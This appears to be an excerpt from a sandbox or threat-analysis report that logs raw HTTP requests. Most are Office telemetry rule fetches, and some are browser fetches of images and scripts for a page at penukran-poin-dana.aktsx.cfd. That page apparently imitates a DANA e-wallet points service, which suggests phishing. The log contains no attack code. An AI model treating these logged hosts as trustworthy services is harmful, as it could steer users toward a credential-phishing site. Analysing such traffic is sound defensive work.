Source: global trafficHTTP traffic detected: GET /asset/img/load_bg.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/indo.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /asset/img/load_spin.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /jquery-3.5.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ionicons@7.1.0/dist/ionicons/p-40ae2aa7.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://penukran-poin-dana.aktsx.cfdsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://unpkg.com/ionicons@7.1.0/dist/ionicons/p-1c0b2c47.entry.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEi8hbZEfutKvr9pkj0-mkJYWt-1SBtt3gw-HFOEZc0172okrp0SFHLaW3PRGVDm1U0P7WWEMELIw4nlq1_1gCgyZBo3cxf-OJNpguNamdJryCkGU-hTHiW3RyOv5JD9eIjXTFtrJFCVn0ae4RxG4Oi-czAP20tEaJI3OstxFAbtOwtFxp6RvOHc6NZL/s1600/load_bg.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEhl9xJVYWF_a9vAhgW5QQgozvZVADTaJgIX64iO7a5sQuMpSoPBK3zfKjvT6xc9fZPfxZz39mjk1H_oZOOOtYvO1l7DkWNqiD5LJyGYdwDNyHuyqLk_Ix6eFs3aLCG2yUXVwtsnj0BXTA40WZmecyLyCIm_ff0xNkkOvkuKBOl6yfS-QjI_EJrIyGtU/s1600/load_spin.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEgbD-mmuMUDwaeFMEz6NefivuQqHyrFXvXxqVxMhYRhR5wsfUhiWkPNkpxLKkagRNpJ2obIiZH_D9EK6tnHIJUFMVBOclZI98zrU7VPszAR5n-_GeSWNCNgnfH1MRWuL-ahhPjxsejyDa5yyWAaOMWXWT4jS4EngtdLLlXjaPakQoFIOsjyS6tfnEBHDlw/s16000/output-onlinegiftools.gif HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ionicons@7.1.0/dist/ionicons/p-1c0b2c47.entry.js HTTP/1.1Host: unpkg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ionicons@7.1.0/dist/ionicons/svg/chevron-back-outline.svg HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: http://penukran-poin-dana.aktsx.cfdSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ionicons@7.1.0/dist/ionicons/p-40ae2aa7.js HTTP/1.1Host: unpkg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEilUMIG_IMFVixTFpWb4xA5f1HJt25lbv-cc1baknB_YJeWO9FYU4SJOzdeMNkA1msFpUU-0MiI3B-llmFX122-XhqCq7-1HW4YUfaWX52rlNtfspDDvlFNj_A--xZIRknP3ycDkzm51noxYaFx_gfOck3U745QZSBwpCSesqOq1oEycuQamqaZlqoz/s16000/ezgif.com-crop%20(3).gif HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEid9dARAQbMu1UTEgpOfyH6pn4eI3_XArbELp_8lfZtysRgex-gqs0Czc9ch_O7U2lrucgBVSqGQEL33BwV3Ri4D3evjzJHJ6LBFa_K-pIPbdO6QQ3iHlTkLiqo_w2z2NbXTw83lNcWHG7T9q2n6m7N3SZ-qfZpTdsioS3dm-YIfJh4zU16QEODOLKn/s16000/AddText_06-06-08.17.04.jpg HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEixR-U2gHP_VriGKaaVcf-_BbZmvWWoaRI8Wd26DYewNJayil_To6kgdWxmdq3TDJKQJ7lAAbD1de1uuuWTLQzCGdR8qT1S2mTehsdR02AFN573iPkN-0IrliCuRAy0xJfSH9AlfJWV7odqpRC_bxJLM2EkLf-84_ePEjEfE8SOtiKfEjcLQ7nDBjDc/s16000/ezgif.com-crop%20(4).gif HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEjj8Fs3JMUwF85O07XgsV-e1rmQjTwS91jcu-zh3Lr_fEgVfhY823rmnMewtU59iGvsFjcBm-12OLSj81f57ZEksJeU2GaG7UU3zuwDsOsfTO4dAJ693JJyILcXjdHEzirw-pPBCeV1CfTqSroNgoMTGIfy-Y-HC8GAJDmo68GYd1-x2gGu0UsincrU/s16000/ezgif.com-crop%20(5).gif HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ionicons@7.1.0/dist/ionicons/svg/chevron-back-outline.svg HTTP/1.1Host: unpkg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEid9dARAQbMu1UTEgpOfyH6pn4eI3_XArbELp_8lfZtysRgex-gqs0Czc9ch_O7U2lrucgBVSqGQEL33BwV3Ri4D3evjzJHJ6LBFa_K-pIPbdO6QQ3iHlTkLiqo_w2z2NbXTw83lNcWHG7T9q2n6m7N3SZ-qfZpTdsioS3dm-YIfJh4zU16QEODOLKn/s16000/AddText_06-06-08.17.04.jpg HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEjj8Fs3JMUwF85O07XgsV-e1rmQjTwS91jcu-zh3Lr_fEgVfhY823rmnMewtU59iGvsFjcBm-12OLSj81f57ZEksJeU2GaG7UU3zuwDsOsfTO4dAJ693JJyILcXjdHEzirw-pPBCeV1CfTqSroNgoMTGIfy-Y-HC8GAJDmo68GYd1-x2gGu0UsincrU/s16000/ezgif.com-crop%20(5).gif HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEilUMIG_IMFVixTFpWb4xA5f1HJt25lbv-cc1baknB_YJeWO9FYU4SJOzdeMNkA1msFpUU-0MiI3B-llmFX122-XhqCq7-1HW4YUfaWX52rlNtfspDDvlFNj_A--xZIRknP3ycDkzm51noxYaFx_gfOck3U745QZSBwpCSesqOq1oEycuQamqaZlqoz/s16000/ezgif.com-crop%20(3).gif HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEixR-U2gHP_VriGKaaVcf-_BbZmvWWoaRI8Wd26DYewNJayil_To6kgdWxmdq3TDJKQJ7lAAbD1de1uuuWTLQzCGdR8qT1S2mTehsdR02AFN573iPkN-0IrliCuRAy0xJfSH9AlfJWV7odqpRC_bxJLM2EkLf-84_ePEjEfE8SOtiKfEjcLQ7nDBjDc/s16000/ezgif.com-crop%20(4).gif HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
